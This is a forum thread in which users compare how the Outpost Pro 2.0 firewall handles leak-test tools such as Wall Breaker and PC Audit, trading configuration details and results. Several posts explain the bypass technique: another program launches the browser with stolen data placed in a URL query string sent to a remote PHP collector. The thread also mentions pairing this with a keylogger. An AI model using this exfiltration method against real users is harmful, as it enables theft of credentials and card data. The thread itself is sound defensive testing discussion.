Opinions about pcInternet Patrol 2.0 Firewall!

Hi,

gkweb, I understand what you are saying. There is a school of thought that says that the firewall should be configured to handle all possibilities in the universe by default. Actually, I really do not subscribe to that philosophy. For experts it is fine. For beginners, it is not. And, except for e-mail which should be covered by an anti-virus, I have a hard time understanding where someone would pick up a trojan or virus so bad that it contains one of the more advanced firewall defeating algorithms. There must be a comprimise between usability and security, especially for beginners. The advanced configuration should be left ot the experts. And, in my opinon Outpost is as capable as any to handle the majority, if not all of the "real" threats out there. However, that does depend on the user, their skill, and their experience.

_anvil, I had the browser open and a download manager running constantly while running PC Audit and Wall Breaker. The PLAIN and SIMPLE fact is that Wall Breaker could not load the web page and PC Audit consistently told me that "My PC is well protected" and I got NO e-mail. I am not sure how I could have possibly given these leak tests a better chance. They simply failed to bypass Outpost. And believe me, if they would penetrate Outpost and my configuration, I would be the FIRST to give Agnitum notice as I have done many times in the past. If any leak test that I have confirmed fails to penetrate (as described in the thread I linked) OP2 firewall does penetrate OP2 on some user's system, then it is simply mis-configured. In most cases, if someone insists that OP2 pass the tests, we will instruct them on how to setup their firewall in the forum.

In general, I will admit that the auto configured setting leaves a little bit to be desired. But, then anybody wanting to pass sophisticated leak tests should know better than to EVER let auto configuration take place in any firewall.

 

Hi gkweb,

It's up to you of course, but first thing I do when configuring any FW is disallowing any access to Explorer to the W3 : it as no reason to be considered as a web browser.
On non NT OS, it must sometime be partially allowed.
With OP, if you set any app among the trusted applications, OP has no control at all on this app.

I don't remember for sure but I think no app is by default in the trusted apps.

It's not really the right terminology to say "maximum security settings" if you introduce by yourself a weakness by what I should consider a purposely bad configuration but I understand you point

Rgds,

 

To sume up, i never said that firewall should by default block all threat, i'm not from this school, i'm only intesresting about the detection engine capability, that it can see.
For me it's an important security component by itself, and after, only after when i know weakness of this engine, i add improvement to cover it.
Some doesn't care of real capability of it, some are just interested with all their security measure if they leak or not, and often the answer is no.
Me, i'm interesting about details, those who are sharing this will can see information that i give.

You talked about beginners, that it would be compromise between security and usuability, and this exactly that i want to show.
A beginner doesn't know how to set up his firewall, so the stronger is his personal firewall detection strenght, the better will be his security.

But this is a security component that is not a priority for everyone, it is for me.

@ JAck
Put IE fully trusted, and run "Tooleaky", OP2 will block it because it has control on it.
Try Look'n'Stop, fully trust IE, run Tolleaky and again, blocked because it has control on it.

regards,

gkweb.

 

@DavidH

Hmm, the only application rule, I had set up was:
'iexplore.exe, TCP out, port 80: allow'
No change of global rules, component control 'normal.'
Is that 'misconfigured'?

When you tested: did OP2 show an alert pop-up? If yes, what was the message? If not, what did the log say (the reason for blocking the leaktest should be logged)?

What OS do you use? I use WinXP.


@gkweb

Nicely explained, I've the same thoughts about leaktests as you.
I also like to go into details, and not just:
'klick -> leaktest blocked -> "hooray"'
or
'klick -> leaktest not blocked -> '

 

lol anvil

as far better sume up than me, congratulations

regards,

gkweb.

EDIT : when you talked about Wallbreaker, say about which test, the first (explorer trick) or the second (launch only IE).

 

_anvil and gkweb.....as far as PC Audit is concerned, I have not had a problem. As for Wall Breaker...I was confused by the Wall Breaker test and mistakenly kept pressing "yes". After, I read the directions , I managed to execute the second test for Wall Breaker and OP2 did indeed fail. The mistake was mine. I am sorry about that.

I am curious about a couple of things though. All the second test seems to do is open a browser and load a web page. Is this really a leak? I have not captured any packets, but I assume all that was sent was a SYN packet to TCP port 80 on the site your leaktest prescribed. And, since port 80 is normally allowed for IE, the page loaded nicely. I am just wondering if substantial data can really be transported this way. After all, it was an outbound connection that was established and it was only a request to load a web site, as far as I know. Perhaps UDP can be used to export data. But, in that case there would have been an alert since IE is not allowed to use UDP on my system.

At any rate, I learned at least one thing here today. I should make more of an effort to read the instructions rather than assuming how something works. I will make the appropriate corrections to the Leak Test link. Thanks.

I have to go now, but I do look forward to any insight regarding the questions I posted in this thread. Have a good day.

 

Hello gkweb,

I did not try and shall not
I never put any app fully trusted with any FW : maybe it would pass leaktests with flying colours but nevertheless totally unsecure anyway
Leaktests give a hint about FWs abilities, that's all. Could even give a false security feeling to newbies. Only usefull for advanced users or at least involved with their own security IMHO.

Cheers,

 

@DavidH

No prob.
The leak, which Wallbreaker shows, is quite simple and basically the same as in Tooleaky. It can (only) be used to transfer personal data (passwords, credit card numbers,...) to a foreign, 'evil' web server. The personal data is a part of the URL, which your browser connects to
(http://perso.wanadoo.fr/jugesoftware/doyouleak.html?PERSONALINFORMATION+CREDITCARDNUMBER+PASSWORDS+MAILACCOUNT.) The webserver just recieves the url, and reads the personal data in it. This connection is initiated by Wallbreaker.
The test would be passed by your firewall, if it detects, that it is wallbreaker.exe, which originally initiated the connection. But in both wallbreaker tests, most (all?) firewalls fail to see this...

Sorry for insisting: _how_ does OP2 pass pcAudit (normal component control) and Wallbreaker-Test 1 on your machine? Does OP2 alert you? What do the logs say?
It's for my own peace of mind...

 

Good thing, now we know that WB bypass OP2 (for example, but LnS too, and all other tested).
Now, time to answer to "is this a leak?"

Yea, it is! You may not noticed that the url called was :

http://perso.wanadoo.fr/jugesoftware/doyouleak.html?PERSONALINFORMATION+CREDITCARDNUMBER+PASSWORDS+MAILACCOUNT

How to transmit information? the web page just should be a php one instead of html, and then after the "?" i just have to transmit like this:

http://url/page.php?variable=personalinfos

Behind this i can have an SQL database which can record any information sent...
This idea about "how to transmit" was showned first by Tooleaky with in launching IE sent information too, but Tooleaky is blocked by most firewall nowadays, WB use another trick

At the end, about adavanced information transmition by this method, i copy/paste what the Tooleaky leaktest author said :

But it could be very simple that the trojan uses keylogger feature, and as soon as a credit card number is detected, send it to the remote page.

So yes, i think that this leak could seriously hurt

If you launch IE yourself it's good, but if it's another program that launch it, serious leak can happens.

regards,

gkweb.

 

Someone discovered an interesting thing... hmm... "terrific" thing.

Indeed, if IE is already started, no matter that explorer.exe is blocked and IE have restricted rules (http 80, dns, etc...) WB uses the existing process, it doesn't launch an other one, then it go trought firewall each time for both test.
The more terrific is that even SSM doesn't see it because WB doesn't launch an other app (if IE closed, SSM perfectly see it and warn you).

So even if a firewall would be able to block WB when IE is closed, when IE is already started, the use of the existing process _seems_ to not be avoidable (i need your point of view!).
If even SSM can't see Wallbreaker.exe access the process iexplore.exe, how a firewall could do it ?

Is there any way to see an executable accessing a process? or even locking a process to avoid such exploit?

gkweb.

 

Nite,

Did you tried by yourself ?

IE open and/or Opera I get a warning

 

Yes, the same here... there is always a _new_ IE process started in both WB tests - no matter if there is already an IE process running.

 

each time that IE is started on my comp, WB use it instead of create a new one, what's going on

i will investigate it much, but we are two against two : 2 comp with create new process, and two with using existing one...

Meanwhile, it's a very interesting new! can you make screenshot (or list here) of your running processes pls ? (and remember me what OS you have... hmm... XP for anvil )

thanks.

gkweb.

EDIT : i wanted to say "windows services"

 

gkweb and _anvil,

I just spent half an hour writing a more detailed response. However, I lost my connection and my post. I am unsure why. I will make this one short.

gkeweb, I have had similar results as you with WB-Test1. I believe the problem with test 1 last night may have more to do with the same sort of connection issues that I am experiencing today than OP2's ability to block the test. I will do a little more testing and update the Leak Test info for Outpost appropriately.

_anvil, in the case of PC Audit, I get a rule creation popup for explorer.exe and component control popup for winlnet.dll. In each case I block and PC Audit tells me that my system passes. I used a clean configuration with normal component control and also cleared out all of the old module information. Attached are the log entries which coincide with the prompts that I was given by Outpost when running PC Audit. If you would like anymore info, let me know.

Thanks....

 

@DavidH

Hmm, on my machine there is no 'component control popup' on NORMAL level when testing pcAudit - only on MAXIMUM level...
Of course, winlnet.dll is not on the 'trusted' components list _before_ the tests with pcAudit - but _afterwards_ it is, without ever getting a 'component alert'...

Normally OP2 should block this easily on NORMAL level, but it just doesn't (other leaktests with dll-injection _are_ blocked on NORMAL level.)
I'm testing on a fresh installed WinXP system, so there shouldn't be 'bad' influences.
What is your OS again, DavidH?

 

Sorry to post between your posts, continue, but i really need to know how an other IE processus is started when IE is already started, when you try the second WB test...

If i click twice on my IE icon on my desktop, i have two process.
I i launch it, and then i do the second WB test, same process is used, whereas with you anvil other process is created, i need to know how

regards,

gkweb.

 

LOL, it's exactly the contrary on my machine!

Only the first wallbreaker test uses an already running IE process - while in test 2, there is always started a second process...

 

Hi

I have been reading this thread but am bit confused about what is being said.
Doesn't appear WB is using a HOOK and only kicks in with IE?
If this is the case, you should see a different DLL loaded shouldn't you?
Or a another call to a DLL?

con

 

Hi

WB doesn't "appears" to work in one way or other to me, because i done WB, so i know how it works
WB doesn't use hook or DLL injection, in the two test it calls another executable, that's all.
After, windows seems to react differently on our comp, and i want to know why

regards,

gkweb.

EDIT : i just tested on Win 2000 too, and same process is used for both test if IE is already started...

 

Hi _anvil and gkweb,

hmmmm. It is starting to like we have three or four topics being discussed here.

That is a curious situation. You might try to start with a new configuration by making that selection from the File Menu. I named mine 'leaktest'. I have made only one rule: TCP, Out, 80, Allow. Then, Exit and Shutdown Outpost and add a .bak extension to modules.ini and modules.0 in the Outpost installation directory. After all that is finished, restart Outpost and try the tests again. Hopefully you get the same results as I. If not, it may be benefical to generate some logs and foward them to Agnitum.

Strange, at normal component control level, winlnet.dll is not on my trusted components list before or after PC Audit execution. It is difficult to say why Outpost is not alerting you of the new component as it does on my system.

My OS is Windows XP Home with no customization made to the default running services and no substantial registry tweaks. My network consists of a cable connection through a Toshiba cable modem, and SMC wireless router, and then to an SMC wireless ethernet card on my PC. The only running processes, other than system processes, are NOD32 AV and Outpost. If you need some specific information, let me know. If needed, I can send you my Outpost Config files, INI Files, and even a registry export for comparison. That might help us find out why you are getting different results.

gkweb... Not knowing what is going on in general with WallBreaker at this point, I have changed the info regarding Outpost and Leak Tests to reflect that it fails both Wall Breaker tests. I do not want to take any chance that I am giving wrong information to a user. While the forum is no longer directly associated with Agnitum, many users still come there for support and so it is important for our information to be as accurate as possible. This is an interesting and educational conversation for me and I will continue to follow it. If there are any tests or experiments that I can do on my end or request that Agnitum do, let me know. I am happy to help.

Have a good day.

 

no way to make IE start an other process when one exist

i think we are the first to see a new surprising discover : the Windows OS are muting (mutate?) like virus, it's a new kind of life!
The Polymorphic COS (Clever Operating System) does what they want, this is why mine don't want to launch another process!

Sorry, i become mad i guess

gkweb.